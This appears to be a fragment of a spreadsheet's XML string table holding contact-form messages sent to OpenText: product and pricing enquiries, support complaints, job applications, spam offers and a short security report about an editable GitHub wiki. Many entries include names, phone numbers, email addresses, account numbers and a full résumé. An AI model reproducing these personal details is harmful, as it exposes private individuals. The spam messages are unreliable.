_x000D_
Mark Downey_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I couldn't able to connect client network</t>
  </si>
  <si>
    <t>Inushs</t>
  </si>
  <si>
    <t>Indueb</t>
  </si>
  <si>
    <t>MP</t>
  </si>
  <si>
    <t xml:space="preserve">Niec </t>
  </si>
  <si>
    <t>Inshsb</t>
  </si>
  <si>
    <t>Isnhd</t>
  </si>
  <si>
    <t>I have some technical queries</t>
  </si>
  <si>
    <t>Dindha</t>
  </si>
  <si>
    <t>Requesting official quote for the EnCE Certification Bootcamp ($5,085.00 per student) as the request quote button is not working for me. Thank you.</t>
  </si>
  <si>
    <t>Can the Brava product convert a PDF document to a Word document?_x000D_
_x000D_
If so, how do I do it?</t>
  </si>
  <si>
    <t>Djbd</t>
  </si>
  <si>
    <t>I’m the Application solution architect in 3D Networks(Singapore SI company), currently we are planning to bid a Singapore Government tender._x000D_
The solution is to use SharePoint to build a Document Management System with OCR capability._x000D_
Now I would like to check your product licence cost plan?_x000D_
As the SI, if we are using opentext to develop the System for our customers, any discount for us?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am looking for the latest version of Archiving for Content Server. Could you please help me with this information?_x000D_
_x000D_
Thanks,_x000D_
Bhawna Sharma</t>
  </si>
  <si>
    <t>Good day, _x000D_
_x000D_
I would like to inquire if you will consider someone who's not experienced for the csr/tsr position that requires a Spanish bilingual speaker. I would like to refer someone but she is not yet experienced, she's willing to learn and she is a native Spanish speaker who speaks fluent English as well. Please let me know your response through my email chinnychian@gmail.com. _x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">I have a question about Brava-IGC License Manager._x000D_
Currently , Brava-IGC License Manager was installed in an old server(Windows Server 2008)._x000D_
_x000D_
As we all know, Windows Server 2008 will end of life in the near future ._x000D_
So, we decide to buy a new server with Win Server 2016 or Windows Server 2012 R2 to replace the old one._x000D_
We are confused about the OS version in new server._x000D_
_x000D_
Would you please give some advices or official files for us to make decision._x000D_
For example: whether current Brava-IGC License Manager can work in Windows Server 2016 or Windows Server 2012 R2?_x000D_
Or we can install a new version of Brava-IGC License Manager which also support Brava Desktop v16.4/v7.2 on the new server?_x000D_
</t>
  </si>
  <si>
    <t>Searching for jy</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to upload resume_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I like this works </t>
  </si>
  <si>
    <t>(02)98525236</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am 3rd year undergraduate student and looking for summer internship in field of Data Science and/or Software development.I am interested in doing internship at Opentext so please tell me if there is any opportunity available.</t>
  </si>
  <si>
    <t>I have a recent graduate in bachelors of business management from Ireland, as well as I've got an MBA degree from Istanbul in Turkey, as I've knowledge of four languages where I'm native Arabic speaker, Fluent in English, good base of French, and an intermediate level of Turkish,_x000D_
_x000D_
I have a keen interest to pursue a career in the domain of Sales, Customer Service, or as an Administrative at OpenText Middle East Dubai, hope you take this into consideration. Further details, will be happy to assist you with,</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Nous sommes une compagnie d’assurance au Maroc client de Documentum_x000D_
L’implementation Actuelle de la solution ne donne pas satisfaction et Nous menons des réflexions concernant la gestion électronique des documents_x000D_
Nous souhaitons d’abord examiner les possibilités technologiques de Documentum avant d’envisager un éventuel changement _x000D_
Au Maroc nous n’avons pas beaucoup d’intégrateurs Documentum et ceux qu’on a trouvé nous ont donné deux versions différentes de l’architecture cible_x000D_
Nous souhaitons rentrer en contact avec un expert Documentum de l’editeur afin d’avoir la meilleure configuration cible _x000D_
Est ce que vous pouvez nous mettre en contact avec un expert en France ?_x000D_
Merci de votre aide _x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I’m a long time reader._x000D_
_x000D_
I’m writing to you because I’d love to contribute a guest post to your website._x000D_
_x000D_
I’ve been brainstorming some topics and I think your readers would get a ton of value from them._x000D_
I’ll make sure the piece is filled with information that can’t be found anywhere else. In exchange, all i expect is a backlink from within the main body of the article._x000D_
_x000D_
Do let me know if you like this proposal and if I can begin sending you some topic ideas._x000D_
_x000D_
Sincerely,_x000D_
Hassan K.</t>
  </si>
  <si>
    <t>We are looking to integrate our SAP DMS with OpenText DMS Server.</t>
  </si>
  <si>
    <t>Djnd</t>
  </si>
  <si>
    <t>Jsndh</t>
  </si>
  <si>
    <t xml:space="preserve">I have on premise SAP S4/HANA i need to integrate my pdf scan with my SAP using OpenText. I need this solution before the end of the year  </t>
  </si>
  <si>
    <t xml:space="preserve">Good day!_x000D_
_x000D_
I am seeking IT internship opportunities as a school requirement for graduating seniors. Relevant on-the-job training and experience will significantly help us get that real world feel of IT work. _x000D_
 _x000D_
We have basic skills that we can use but what's really important for me is to prepare myself for the tough grind of corporate work ahead of me. A first hand understanding of the business side will allow me to evolve myself slowly as a well-rounded IT professional. The way I see it, IT and Business always goes hand in hand for any company._x000D_
 _x000D_
I hope you have the opportunity to take in striving and aspiring students like me in your organization. I see that you offer solutions for specific industry areas, analytics and enterprise management information systems, I would love to be a sponge for these knowledge areas._x000D_
 _x000D_
Thank you very much and hoping to hear a positive from your organization._x000D_
 _x000D_
Sincerely,_x000D_
Fiona Ellese Pingkian_x000D_
Contact # (+63) 947 9066 101_x000D_
 _x000D_
 _x000D_
Internship Requirements:_x000D_
 _x000D_
1. 520 hours of internship assignment_x000D_
2. Internship Provider Documented Training Plan**_x000D_
3. A Signed MoA (CHED) by both Internship provider and University coordinator**_x000D_
4. Internship role to focus on Operating Systems, Design/Development and Business Analysis_x000D_
5. To start by 1st half of January 2019 or upon completion of item #3._x000D_
6. Open to internship work from Monday to Friday and additional hours of work that maybe required._x000D_
 </t>
  </si>
  <si>
    <t>I need to sell the product</t>
  </si>
  <si>
    <t>What about this opportunity with the following document</t>
  </si>
  <si>
    <t xml:space="preserve">I need to learn more things </t>
  </si>
  <si>
    <t xml:space="preserve">Zayed was a really cool guy i want to kiss him </t>
  </si>
  <si>
    <t xml:space="preserve">Zayed has always had been the most amazing guy ever </t>
  </si>
  <si>
    <t>Auksjhgsjhgcjhgdscjh</t>
  </si>
  <si>
    <t>Finding a jobs</t>
  </si>
  <si>
    <t>0559241466 yes</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
Maybe some of your kind web master assistants could help us: we are looking at authentica com domain to register our activities in field education in a secondary school of Art based in Rome, ITALY, and we found that it is now owned by your Company. What we find so tricky is that your Company name is OPENTEXT COM and not AUTHENTICA COM. Seems, in fact, that these 2 identities are not properly linked together. Or this is our impression. Is there any lucky possibility to let authentica com free and be hold by us to support our project? We will be immensely thankful and grateful for your assistance and kind feedback about._x000D_
With trust and understanding, _x000D_
Ms Roberta Pasteur </t>
  </si>
  <si>
    <t>I hope I be accepted</t>
  </si>
  <si>
    <t>Yisd</t>
  </si>
  <si>
    <t xml:space="preserve">In the preliminary stage to evaluate products to use Web API in our Mobile App to view files and share._x000D_
Need complete price details and information._x000D_
_x000D_
Regards_x000D_
_x000D_
Naeem </t>
  </si>
  <si>
    <t>Looking for a job in open text, my skills NodeJS, angular, JAVA, MYSQL, HTML, CSS, AJAX,JSON, XML, JSP, SERVLETS, PHP</t>
  </si>
  <si>
    <t>Sir,im very much interested in working in opentext.</t>
  </si>
  <si>
    <t>We would like to report a bug in opentext viewer while viewing PDFs created from Cad software.  We have a vendor who uses your browser plugin.  We can't seem to get any where with them on this issue.  I'd really like to get some insight directly from you.  Thank you!</t>
  </si>
  <si>
    <t>Niko</t>
  </si>
  <si>
    <t>Hello Support,_x000D_
_x000D_
Can you please tell me how I may download EnCase Portable? I have my dongle and would like to use the legacy software in a training exercise. _x000D_
_x000D_
Kind Regards,_x000D_
Mark Barros</t>
  </si>
  <si>
    <t>Need to download app</t>
  </si>
  <si>
    <t xml:space="preserve">I need this Job am unemployed </t>
  </si>
  <si>
    <t>We need to update our billing information as the credit card currently on file will be closed at the end of the year.  We have tried to update on my profile but it won't allow us to change the card information.  Please call or email me regarding what we need to do to get this billing information changed.</t>
  </si>
  <si>
    <t>If the company to add stuff</t>
  </si>
  <si>
    <t xml:space="preserve">I’ve more experienced and good merchandising and also hard working </t>
  </si>
  <si>
    <t>Looking for a solution to redact future PKI data from systems/d/b tables.</t>
  </si>
  <si>
    <t>Trying to download Imager and it says I am not allowed to... I put in my info to download it and then clicked the link to download the software, it redirects me to opentext and then i can't download it.</t>
  </si>
  <si>
    <t>Our environment is currently using OpenText Exceed 14.x, however before allowing Exceed 15.x to be used in our environment, we evaluate that the software is FIPS 140-2 certified. I noticed the previous version of Exceed 14 has a FIPS 140-2 certification, however I did not see one for Exceed 15.x. I was wondering if OpenText Exceed 15.x has a FIPS 140-2 certification.  _x000D_
_x000D_
Thank you. _x000D_
_x000D_
Jean Bataille</t>
  </si>
  <si>
    <t>Please be advised that the Toronto Transit Commission recently advertised for ta Request for Information - Document Control and Review Tracking Software on the MERX web based electronic tendering system under “Agencies, Crown &amp; Private Corporations”.  _x000D_
Regards,_x000D_
Joanne</t>
  </si>
  <si>
    <t>Gentlepersons:_x000D_
_x000D_
  I am looking to obtain pricing on your OpenText Fax2Mail.  If you'd be so kind as to email me verification of: 1) the cost of OpenText Fax2Mail; 2) any associated licensing expenses; and 3) any recurring expenses, I would appreciate it.  _x000D_
_x000D_
  Email is the best way to get a hold of me due to my daily schedule however, if needed, I can schedule a time to speak with a customer service representative._x000D_
_x000D_
  I look forward to hearing from you._x000D_
_x000D_
  Sincerely,_x000D_
_x000D_
_x000D_
  Kevin M. Murphy, J.D._x000D_
  Michael C. Murphy Elder Law P.C._x000D_
  1001 N. Hickory Rd., Ste. 7B_x000D_
  South Bend, IN 46615_x000D_
  PH (Work): (574) 235-7950_x000D_
  PH (Cell): (574) 904-2883_x000D_
  FX: (574) 235-7954_x000D_
  Email: Kevin@murphyelderlaw.com</t>
  </si>
  <si>
    <t>Download link for NFS Client v14 software. We had recently purchased 10 units of license for this software. However, I'm not able to download the software from MYSupport. Kindly assist.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking to obtain a license for Open Text’s catalog system, that would allow us to download UPC codes for all of HSN’s products. </t>
  </si>
  <si>
    <t xml:space="preserve">THE MHRI requires professional services of a SharePoint Architect &amp; Developer for the following:_x000D_
- Installation of SharePoint server and clients on our Hardware._x000D_
- Design and implement our ECM on the SharePoint platform as part of our records_x000D_
management process as well as the importation of historical content_x000D_
- Assist with the integration of the SharePoint ECM into the WMS (Work Management_x000D_
System) Middleware. </t>
  </si>
  <si>
    <t xml:space="preserve">3rdtempt to get someone from your organization to return an email or a call. </t>
  </si>
  <si>
    <t xml:space="preserve">User Access for B28 on our account is getting an error that ' user is not authorized to the page' after logging in. </t>
  </si>
  <si>
    <t>Hello,_x000D_
My name is Cory Hull and I am working with the United States Navy. We have an older piece of softwar that was developed in the late 90's that is using SQLbase version 6.1.2. The program works fine with Windows 7, but we are having problems with the program running on Windows 10 and we are almost certain that the issues are coming from the older version of SQLbase. Is there any way to make this older version work with Windows 10?_x000D_
Thank you so much,_x000D_
Cory Hull</t>
  </si>
  <si>
    <t>Have a prospect looking to move to Dynamics 365 BC and has Trusted Link EDI working with a old legacy system that will be replaced.   Need some inform and keeping or upgrading to D365</t>
  </si>
  <si>
    <t>Uif assistant</t>
  </si>
  <si>
    <t>Hi, I need pricing for the below renewal for DWP:_x000D_
EnCase® Forensic SMS 16% per year for 3 years</t>
  </si>
  <si>
    <t>Non</t>
  </si>
  <si>
    <t>Uif enquiry</t>
  </si>
  <si>
    <t>need API to embed into our code to fax directly from a microsoft .net  framework 3.5 windows forms application</t>
  </si>
  <si>
    <t>We have a customer that is looking to renew their Open Text maint and subscription</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je vous avais contacté pour vous faire part de l'intérêt de la société RTE pour vos outils de gestion documentaire et Workflow, en vous demandant une démo de vos outils. Seulement je n'ai jamais été recontacté._x000D_
_x000D_
Je réitère donc ma demande de démo de vos outils. Merci de bien prendre en compte mon message et de me recontacter à cet effet._x000D_
_x000D_
Cordialement,_x000D_
_x000D_
Lucas Demange</t>
  </si>
  <si>
    <t>I want to join a private server on clash royal</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs,_x000D_
Could You please let us know e-mail address of Your:_x000D_
1) marketing managers_x000D_
2) event managers_x000D_
3) human resources managers_x000D_
4) conference managers?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
_x000D_
I was just going through your official GitHub account and noticed that one of your Github default public wiki is tuned ON which can be edit by any logged in user without even having push privileges in the system. This poses security and reputation risk for your organization._x000D_
_x000D_
Weakness: Improper Access Control_x000D_
_x000D_
Impact: As wiki can be edited by any person on the internet, a malicious attacker can accurately craft a message or a note which would lead a user to download a malicious component in a natural way._x000D_
_x000D_
For example:_x000D_
_x000D_
    Please note that the current version is not stable due to the following line:_x000D_
    informat_note_send.c:4562_x000D_
    To ensure that the program won't crush in production, please consider installing this patch _x000D_
    In case of any following troubles, drop us an email at support@company.com_x000D_
_x000D_
The user would surely trust the code (of course if he trusts the company itself), so he will extrapolate this trust to the wiki and consider it being safe enough to follow the instructions and downloading himself a malware._x000D_
_x000D_
POC: Please find the attached image. For demonstration purpose I have created a new wiki on behalf of you. Here's the link: Please resposnd to this so that I can share the URL because this form doesn't accespting any sort of web links._x000D_
_x000D_
Hope you'll take a look into this. Looking forward to hear back from your side._x000D_
_x000D_
Have a good day ahead!_x000D_
_x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Mohammed Israil_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I have been using the same log in /password details for the last 3 years. Today your system would not allow me to log in, saying the details do not exist. This is urgent please help.</t>
  </si>
  <si>
    <t>Need to upgrade encase 6 to 7, the old dongle</t>
  </si>
  <si>
    <t>Although the format of the file is .pdf ,the application is not showing pdf icon while the user is searching the pdf file in documentum search.</t>
  </si>
  <si>
    <t>Hello, we have an active site licence for Encase Forensic. I would like to download the latest version which I believe is v8.08 but do not seem to be able to find a download centre. I previously achieved this via the email links sent by Guidance Software. Would you be able to provide details of where and/or how to download the latest version of EnCase Forensic? Many thanks, Andy.</t>
  </si>
  <si>
    <t>Re: Websites Promotion _x000D_
_x000D_
Hello,_x000D_
 _x000D_
Trust you are doing very well,_x000D_
 _x000D_
Do you want to see your website in Top 10 position in Google?_x000D_
 _x000D_
If yes, please let us know your domain name which you want to optimize. We will run analysis on your website and no cost and send full report with all the points and where your website is missing._x000D_
 _x000D_
Please let me know your website URL then we will get back to you with our report on your website._x000D_
 _x000D_
Thanks &amp; Regards,_x000D_
Jessica Carner_x000D_
Jessicacarnerseo@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">We have the enterprise EnCase licence with you. I'm trying to access the support page for encase to download Installers but my access is being denied. Can you please allow my access to enable me to get the appropriate installers downloaded. </t>
  </si>
  <si>
    <t>Subject: Selection process for Customer Support Specialist job in Cork_x000D_
_x000D_
Dear Mr Michel Colaci,_x000D_
_x000D_
   The talk with you and Brice was interesting, and I was very pleased. However, I am going to accept another job offer now. Thank you, Fin and Brice very much for your time and efforts! When I am available again, I will let you know. It may be very soon._x000D_
_x000D_
                                                    Merry Christmas to all of you!_x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Po-Lin</t>
  </si>
  <si>
    <t>Bedienungsanleitung SAP Vendor Invoice management - ist diese Bedienungsanleitung in deutscher Sprache verfügbar und falls ja, können Sie mir bitte ein Exemplar senden?_x000D_
Vielen Dank und mit freundlichen Grüßen_x000D_
Stephanie Kaiser</t>
  </si>
  <si>
    <t>Pricing details for: OpenText Capture for Microsoft® SharePoint®</t>
  </si>
  <si>
    <t>fgjty</t>
  </si>
  <si>
    <t>Hi, would like to enquire if your capture communications is able to capture the following information: 1) Voice calls, 2) SMS, 3) Wechat and whatsapp on mobile and desktop devices.</t>
  </si>
  <si>
    <t>vgd</t>
  </si>
  <si>
    <t>dsgere</t>
  </si>
  <si>
    <t>I want to know the expiry date of my ASP support on SUID 44754-12203.  Thanks.</t>
  </si>
  <si>
    <t>KG</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I am looking for Open Text Process Suite to evaluate its fitment and capabilities for a retail company._x000D_
_x000D_
Kindly help with the same._x000D_
_x000D_
Regards,_x000D_
Chalapathy</t>
  </si>
  <si>
    <t>Want greater understanding on how you can help us</t>
  </si>
  <si>
    <t>I need to renew ref RC33903 as ap by Amex if possible...thku</t>
  </si>
  <si>
    <t xml:space="preserve">Need assistance editing our catalog.  </t>
  </si>
  <si>
    <t>hi i am inquiring about a couple of accounts that should be located localy . anyone of the proper individuals can figure it out . agostinho is what im inquiring about . how can i contact the banker in portland oregon to complete the transactions needed for herbert rothschild.</t>
  </si>
  <si>
    <t>We are upgrading a users PC and need to know how to transfer the Brava! Desktop licensing from the old PC to the new one. Thanks.</t>
  </si>
  <si>
    <t>UY</t>
  </si>
  <si>
    <t>Request for Urgently Services for a forensic investigation as soon as possible..._x000D_
Regards</t>
  </si>
  <si>
    <t>Добрый день! _x000D_
 _x000D_
Предлагаем услуги по ликвидации и регистрации компаний по самым низким ценам: _x000D_
 _x000D_
ЛИКВИДАЦИЯ: _x000D_
 _x000D_
Смена участников на офшор – от 35000 руб. _x000D_
Смена директора на нерезидента – от 20000 руб. _x000D_
Добровольная ликвидация– от 9000 руб. _x000D_
Добровольная ликвидация с гарантией отсутствия налоговой проверки – по договоренности _x000D_
 _x000D_
РЕГИСТРАЦИЯ: _x000D_
 _x000D_
Открытие ИП – от 900 руб. _x000D_
Открытие ООО – от 2000 руб. _x000D_
Открытие некоммерческих и общественных организаций – от 10000 руб. _x000D_
 _x000D_
ИЗМЕНЕНИЯ: _x000D_
 _x000D_
Смена участников – от 4000 руб. _x000D_
Смена директора – от 1500 руб. _x000D_
Другие изменения – от 1500 руб. _x000D_
 _x000D_
ДРУГИЕ УСЛУГИ: _x000D_
- Юридические адреса _x000D_
- Готовые компании _x000D_
- Регистрация товарных знаков _x000D_
- Открытие счетов _x000D_
 _x000D_
ПРЕИМУЩЕСТВА: _x000D_
- Работа по Договору _x000D_
- Работаем во всех регионах России _x000D_
- Работаем с долгами и недостоверными сведениями _x000D_
- Работаем через ЭЦП _x000D_
 _x000D_
P.S. _x000D_
Не отвечайте на это предложение со своего почтового ящика, так как оно создано автоматически и не дойдёт до нас! _x000D_
Пишите нам: pravorst@gmail.com _x000D_
WhatsApp/Viber + 7 (926) 743-18-63</t>
  </si>
  <si>
    <t>_x000D_
Hello, _x000D_
_x000D_
This is Gil Barron from TS-electronics company, we are resellers, we have a customer in Mexico asking for OpenText EnCase eDiscovery software, there is a problem if we resale it to our customer? our customer is Mexican goverment,  this would be just one time purchase_x000D_
_x000D_
Will appreciate your fast response!</t>
  </si>
  <si>
    <t xml:space="preserve">Request for ACH Banking Information_x000D_
_x000D_
Accounts Receivable, _x000D_
_x000D_
Please send Banking information for ACH payments_x000D_
_x000D_
_x000D_
Thank you,_x000D_
</t>
  </si>
  <si>
    <t>quisiéramos saber cual es la diferencia entre el kit TD2U y el Kit TX1, quisieramos tambien saber con que tipos de conectores soportan ambos y que adaptadores no incluyen, así mismo quisiera saber si ambos soportan conexión interna para el almacenamiento de Imágenes Forenses discos duros internos sata de 3.5, y el precio de ambos kits y de los conectores no incluidos</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I used to use redact-it and am interested I once again using the tool. Are you still licensing it (Blaze now?) and if so can someone reach out to me to discuss options?  I have a large eDiscovery project needing pii/phi identification. _x000D_
_x000D_
Thx,_x000D_
Caragh </t>
  </si>
  <si>
    <t>We have RightFax outage. Could someone please contact us urgently as some services are not starting</t>
  </si>
  <si>
    <t>For the past week I've been trying to find out who on our team has access to utilize the ecatalog for item set up as we're now doing business with Dillard's and Belks.  And, for the past week, I have been unable to get a response._x000D_
We have an account under Allstar Products Customer ID: 10190027 which has been paid for all of 2019.  _x000D_
Is someone - anyone able to help me find out who the contact you have on file for Allstar is and how we can acquire proper ecatalog access to complete item set ups!_x000D_
This has been the most frustrating process.  I have never experienced customer service so incompetent.  Please advise immediately!_x000D_
_x000D_
Thanks Tara</t>
  </si>
  <si>
    <t>I am looking to get in touch with the federal government account POC to discuss the redaction capabilities of Brava!/Blazon for our federal client.</t>
  </si>
  <si>
    <t>Sir, l will be great full to get the work from your hand.thanks</t>
  </si>
  <si>
    <t>Need extra security i stay having trouble with people gettingbin my accounts an not being able to access my stuff as usual</t>
  </si>
  <si>
    <t>Support - Indiana Health Information Exchange is a customer of RightFax.  Our development team has some questions about API integration and best practices.  This is currently impacting Production functionality for one of our mission critical systems.  Can you please advise on the best way to get the developers connected with someone that can help answer their questions &amp; give some direction?_x000D_
_x000D_
Thanks,_x000D_
Brian Lawson</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I need access to OpenText site trading grid to be able to add/modify customer information for our company's EDI trading partners.  Please let me know if there is a way you can add me to your system.  The last EDI specialist from our company has left and we do not know her credentials.  I will be the lead for EDI with our company so I will need administrative access for our account._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Brett Henning</t>
  </si>
  <si>
    <t>Hi team,_x000D_
I would like to access the knowledge base of the opentext,kindly let me know what is procedure to proceed._x000D_
I would like to gain knowlwdge about opentext exstream , as i am working in  the tool for one of my requirements._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I'm looking for the job</t>
  </si>
  <si>
    <t>Interesting in your workflow component. Please call my cell. 626.202.8751</t>
  </si>
  <si>
    <t>Hello, I'm having trouble accessing the ...knowledge.opentext... site.  I login to the ...knowledge.opentext.... site and am told that I don't have access and I need to register.  I've selected the "Request Confirmation E-mail" and proceeded through the registration process.  When I login I am logged back into the ...opentext... website but cannot seem to access the ...knowledge.opentext....  _x000D_
Can you please advise on how I can get around this issue?_x000D_
Regards,_x000D_
David O' Connell_x000D_
KineMatik.</t>
  </si>
  <si>
    <t>I need to set up a carbon copy for the VAN</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to schedule a meeting with a sales contact to discuss setting up a sales demo / technical discussion. </t>
  </si>
  <si>
    <t>Hi, May I get a quote for the below please, customer is CA Dept. of Fish and Wildlife._x000D_
_x000D_
1 - EnCase Forensic 8_x000D_
_x000D_
1 - Tableau Forensic Universal Bridge (Model: T356789iu)</t>
  </si>
  <si>
    <t>We purchased Encase.  The registration email has our purchase agent email account and not me as the owner and leader of the sec op team.  how do I register the encase product under my name?  we have already receive the usb with license key.  Also is there a timeframe in which to register?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
Our office is interested in your services especially for faxing. We are a State Farm office and we were told about your services from another State Farm agent. If you could please let us know, more about your services. My email address is myrette@denisegranville.com_x000D_
Thank you,_x000D_
Myrette Nelms _x000D_
</t>
  </si>
  <si>
    <t>We received a final bill for service. This was previously auto paid on a credit card and the invoice has no payment address. Where should we send the payment? Account 765905</t>
  </si>
  <si>
    <t>We are doing post-merger technology rationalization, and we need to archive hundreds of legacy applications.  I need info on how your Archon AI-enabled analytics product can speed up our archiving process, info on customers who have used Archon to do that, etc.</t>
  </si>
  <si>
    <t>General inquiry on upgrade paths for BIRT iHUB Metrics Management 10SP4F2</t>
  </si>
  <si>
    <t>About GPS product that I want to purchase</t>
  </si>
  <si>
    <t>to be mine</t>
  </si>
  <si>
    <t>Accounts Receivable</t>
  </si>
  <si>
    <t>We have received an ACH remittance of $107.00 with no remittance details.  Please provide your remittance advice so we can accurately apply your funds.  Please note that you can email your remittance advice to accountsreceivable@eckertseamans.com.  _x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Need to discuss moving our numbers to another vendor that our company uses so that all are under one company and account number.  I am not sure who our account representative is, but it used to be Kelly Knuckles which I understand is no longer with Xpedite/opentext anymore.  I would expect that a LOA needs to be submitted to get this done.  Our account number is 863361.</t>
  </si>
  <si>
    <t>I'm owner of a SAP consultancy firm having customers with Open text VIM licenses._x000D_
I would like to enhance our offering because we are acquiring good knowledge on the VIM product.</t>
  </si>
  <si>
    <t>HR documentation electronic storage quote</t>
  </si>
  <si>
    <t xml:space="preserve">Need to understand rightfax version 6.2 compatibility. for the document conversion, we would prefer to install Office 2016. Since 2013 EOL.  </t>
  </si>
  <si>
    <t>We are an European Agency (EU public service). We are launching a call for tender for CS services. I would like to disseminate the call to your partners in Europe. The list I found on your website is not convenient because it doesn't contain an email.  Ideally I would like an excel list with name, country and email.  Many thanks for your help,  Isabelle Thomas-Kollias</t>
  </si>
  <si>
    <t xml:space="preserve">I would like go through Documentum 16.4 products documentation like release notes, installation guide, develop guide for different products to know about new versions for understanding the requirements. I have been working on Documentum since 2002 so I would like get more knowledge on latest releases time to time. please provide to access </t>
  </si>
  <si>
    <t xml:space="preserve">I need a list of our Dongle IDs and corresponding expiration dates.  I am taking over responsibilities for a former employee, Brian Kim.  </t>
  </si>
  <si>
    <t>Seeking for the job</t>
  </si>
  <si>
    <t>Hello, I have requested a password reset with no reply. I have checked my junk mail and there is nothing there either. I wish to download the latest version of encase endpoint investigator.</t>
  </si>
  <si>
    <t>Udjdjs</t>
  </si>
  <si>
    <t>Need the price for the porduct below-_x000D_
Forensic Tool</t>
  </si>
  <si>
    <t xml:space="preserve">Installation executable file for Encase v.7.10.05. Where is it???  When opentext bought guidance it's impossible to find downloadble files. I had ordered a dongle change in september, received it in the begining of this month. I am getting frustrated when I encounter so many problems with you guys. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team_x000D_
_x000D_
I am with Wells Fargo Division of Application Products Center of Excellence (APCoE), responsible for researching and identifying latest patches/ releases for 3rd Party Vendor products within the Product Management catalog._x000D_
This exercise is being performed on a Quarterly Cadence for all 3rd Party products and the objective is to keep Wells Fargo’s environment up-to date and safe._x000D_
_x000D_
Could you please let me know the latest version and release date for TeleForm Workstation._x000D_
Even Provide any Latest Versions and release date for 11.2, 11.0 and 16.3_x000D_
_x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t>Request for access technical document for support Opentext customers.</t>
  </si>
  <si>
    <t>Please share with me the best price of open text software.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I am trying to get hold of any documentum expert in Singapore to have a meeting with us regarding a Singapore Government Tender and a Hong Kong Government Tender. I have tried to contact OpenText team numerous time but no one is getting back to me. I’m running short of time. Please get back to me as soon as possible. Very much appreciate it. _x000D_
_x000D_
Thank you_x000D_
Yingjie </t>
  </si>
  <si>
    <t>Hallo Team von Open Text,_x000D_
Ich recherchiere zur Zeit im Feld der ECM Systeme und bin so auf ihr Unternehmen gestoßen. Ich habe mir schon die Infoblätter zur Content Suit durchgelesen und dabei hat sich mir eine Frage aufgetan._x000D_
Ist ihre Plattform kompatibel mit dem ERP System NA Vision von Microsoft? Ich habe bis jetzt immer nur von der Kompatibilität zu SAP gelesen. _x000D_
_x000D_
Bitte antworten Sie mir auf meine E-Mail Adresse._x000D_
_x000D_
vielen Dank_x000D_
Sven Wicklein</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
I Would like to asking about the cordys system. is there any contact person in indonesia. I want to know deeply about this product. or there is demo version that i can download ?_x000D_
_x000D_
Thank you_x000D_
_x000D_
regards,_x000D_
Krisna</t>
  </si>
  <si>
    <t>Icidix</t>
  </si>
  <si>
    <t>DAVID MIZE_x000D_
4085 Camden West Elkton Road Somerville, OH _x000D_
dmize@woh.rr.com 937.452.2060_x000D_
_x000D_
_x000D_
Organized and highly motivated software developer. Demonstrated experience in all stages of the software development lifecycle. Proven ability in problem analysis and resolution. Proficient with Microsoft Access development and maintenance._x000D_
_x000D_
SKILLS AND TECHNICAL SUMMARY _x000D_
_x000D_
 _x000D_
•	Software Development Lifecycle_x000D_
•	Object – Oriented Programming_x000D_
•	Problem Analysis and Resolution_x000D_
•	Database Management_x000D_
•	Technical and End User Documentation_x000D_
•	Software Testing and Troubleshooting_x000D_
•	Project Teamwork and Communications_x000D_
•	Business Processes and IT Ethics _x000D_
_x000D_
Languages:	Visual Basic, SQL, COBOL, Smalltalk, JCL, C++, HTML, Oracle Java_x000D_
Operating Systems:	DOS, Microsoft Windows 7/XP/10, MVS, UNIX, VSE_x000D_
Databases:	DB2, Ingress, Microsoft Access, Microsoft SQL server, SUPRA_x000D_
Object oriented Design:	UML, XML_x000D_
Mainframe Tools:	CICS, TSO, ISPF, Panvalet_x000D_
_x000D_
RECENT EXPERIENCE _x000D_
_x000D_
New Miami Church of Christ Hamilton, OH	2001 - Present_x000D_
Database Manager_x000D_
•	Manage Database of members in Microsoft Access _x000D_
•	Publish weekly bulletin and monthly newsletters_x000D_
_x000D_
_x000D_
Cincom Systems, Inc.   Cincinnati, OH	1991 - 2001_x000D_
Software Engineer / Database Administrator_x000D_
•	Provided customer support to troubleshoot with Supra Database_x000D_
•	Updated and Maintained troubleshooting database for quick resolution to customer problems_x000D_
•	Developed / directed software system for functionality / performance validation_x000D_
•	Consultation on project status, proposals, or technical issues, such as software system design or maintenance_x000D_
•	Prepared reports, correspondence and documentation concerning project specifications, activities or status_x000D_
•	Tested programs or databases, corrected errors and made necessary modifications_x000D_
_x000D_
_x000D_
OTHER EXPERIENCE _x000D_
_x000D_
Total Control, Inc. Cincinnati, OH 	1987 - 1991_x000D_
Computer Programmer_x000D_
•	Wrote, analyzed, reviewed, and revised programs of proprietary software_x000D_
•	Developed and tested program for</t>
  </si>
  <si>
    <t>CG</t>
  </si>
  <si>
    <t xml:space="preserve">Attention Sir/Madam_x000D_
I am Dario Roberto Santos, President MP DO Brazil Ltd. _x000D_
Sao Paulo, Brazil. We are top dealers of your product in the Brasilia market. _x000D_
One of your customers who is in same line of business with us recommended your _x000D_
